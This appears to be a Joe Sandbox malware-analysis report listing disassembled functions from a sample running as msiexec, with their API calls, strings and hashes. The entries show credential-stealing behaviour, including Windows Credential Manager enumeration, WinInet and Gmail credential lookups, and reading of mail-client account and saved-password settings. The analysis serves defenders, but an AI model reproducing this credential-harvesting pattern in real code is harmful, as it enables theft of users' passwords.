                                                                                                                                                      • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 00444612
                                                                                                                                                        • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                      • strlen.MSVCRT ref: 0044462E
                                                                                                                                                      • memset.MSVCRT ref: 00444668
                                                                                                                                                      • memset.MSVCRT ref: 0044467C
                                                                                                                                                      • memset.MSVCRT ref: 00444690
                                                                                                                                                      • memset.MSVCRT ref: 004446B6
                                                                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                        • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                                                      • String ID: salu
                                                                                                                                                      • API String ID: 3691931180-4177317985
                                                                                                                                                      • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                                                                                      • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                                                                                      • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                                                                                      • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                                      • API String ID: 2449869053-232097475
                                                                                                                                                      • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                                      • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                                                                                      • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                                      • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                                                                                      APIs
                                                                                                                                                      • sprintf.MSVCRT ref: 0040957B
                                                                                                                                                      • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                                                                        • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                                                                        • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                                                                        • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                                                                        • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                                                                      • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                                                                      • sprintf.MSVCRT ref: 004095EB
                                                                                                                                                      • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                                                                      • memset.MSVCRT ref: 0040961C
                                                                                                                                                      • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                                                                      • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                                                                      • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                                                      • String ID: caption$dialog_%d$menu_%d
                                                                                                                                                      • API String ID: 3259144588-3822380221
                                                                                                                                                      • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                                                                                      • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                                                                                      • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                                                                                      • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                                                      • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                                                      • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                                                      • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                                                      • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                      • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                      • API String ID: 2449869053-4258758744
                                                                                                                                                      • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                                      • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                                                                                      • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                                      • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                                                                                      APIs
                                                                                                                                                      • wcsstr.MSVCRT ref: 0040426A
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                                                                      • strchr.MSVCRT ref: 004042F6
                                                                                                                                                      • strlen.MSVCRT ref: 0040430A
                                                                                                                                                      • sprintf.MSVCRT ref: 0040432B
                                                                                                                                                      • strchr.MSVCRT ref: 0040433C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                                                                      • String ID: %s@gmail.com$www.google.com
                                                                                                                                                      • API String ID: 3866421160-4070641962
                                                                                                                                                      • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                                                                                      • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                                                                                      • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                                                                                      • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                                                                                      APIs
                                                                                                                                                      • _mbscpy.MSVCRT(0045A448,?), ref: 00409749
                                                                                                                                                      • _mbscpy.MSVCRT(0045A550,general,0045A448,?), ref: 00409759
                                                                                                                                                        • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                                                                                        • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                                                                                        • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                                                                                      • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                                                                                                                                      • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                                                                                                                                      • _mbscpy.MSVCRT(0045A550,strings), ref: 004097A1
                                                                                                                                                      • memset.MSVCRT ref: 004097BD
                                                                                                                                                      • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                                                                                                                                        • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                                                      • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                                                      • API String ID: 1035899707-3647959541
                                                                                                                                                      • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                                                                                      • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                                                                                      • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                                                                                      • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                                                      • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                      • API String ID: 2360744853-2229823034
                                                                                                                                                      • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                                                                                      • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                                                                                      • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                                                                                      • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                                                                                      APIs
                                                                                                                                                      • strchr.MSVCRT ref: 004100E4
                                                                                                                                                      • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                        • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                                                                      • _mbscat.MSVCRT ref: 0041014D
                                                                                                                                                      • memset.MSVCRT ref: 00410129
                                                                                                                                                        • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                                                                        • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                                                                      • memset.MSVCRT ref: 00410171
                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                                                                      • _mbscat.MSVCRT ref: 00410197
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                                                      • String ID: \systemroot
                                                                                                                                                      • API String ID: 912701516-1821301763
                                                                                                                                                      • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                                                                                      • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                                                                      • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                                                                                      • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                                                                                      • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                                                                                      • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy$strlen
                                                                                                                                                      • String ID: -journal$-wal$immutable$nolock
                                                                                                                                                      • API String ID: 2619041689-3408036318
                                                                                                                                                      • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                      • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                                                                                      • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                      • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                                                      • wcslen.MSVCRT ref: 0040874A
                                                                                                                                                      • wcsncmp.MSVCRT ref: 00408794
                                                                                                                                                      • memset.MSVCRT ref: 0040882A
                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                                                                                      • wcschr.MSVCRT ref: 0040889F
                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                      • String ID: J$Microsoft_WinInet
                                                                                                                                                      • API String ID: 3318079752-260894208
                                                                                                                                                      • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                                                                                      • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                                                                                      • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                                                                                      • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                                      • _mbscpy.MSVCRT(0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409686
                                                                                                                                                      • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409696
                                                                                                                                                      • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                                                                        • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                                                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                      • API String ID: 888011440-2039793938
                                                                                                                                                      • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                                                                                      • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                                                                                      • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                                                                                      • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                                                                      • strchr.MSVCRT ref: 0040327B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: PrivateProfileStringstrchr
                                                                                                                                                      • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                                                      • API String ID: 1348940319-1729847305
                                                                                                                                                      • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                      • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                                                                      • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                      • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                                                                      APIs
                                                                                                                                                      • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                                                                      • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                                                                      • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy
                                                                                                                                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                      • API String ID: 3510742995-3273207271
                                                                                                                                                      • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                      • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                                                                      • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                      • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0040F567
                                                                                                                                                      • memset.MSVCRT ref: 0040F57F
                                                                                                                                                        • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                      • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                                                                      • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: QueryValuememset$AddressFreeLibraryLoadLocalProc_mbscpy_mbsnbcatmemcpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 78143705-3916222277
                                                                                                                                                      • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                                                                                      • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                                                                                      • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                                                                                      • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                        • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                        • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                        • Part of subcall function 00410863: CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                                                                                      • strchr.MSVCRT ref: 0040371F
                                                                                                                                                      • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                                                                                                      • strlen.MSVCRT ref: 00403778
                                                                                                                                                      • sprintf.MSVCRT ref: 0040379C
                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                                                                      • String ID: %s@gmail.com
                                                                                                                                                      • API String ID: 3261640601-4097000612
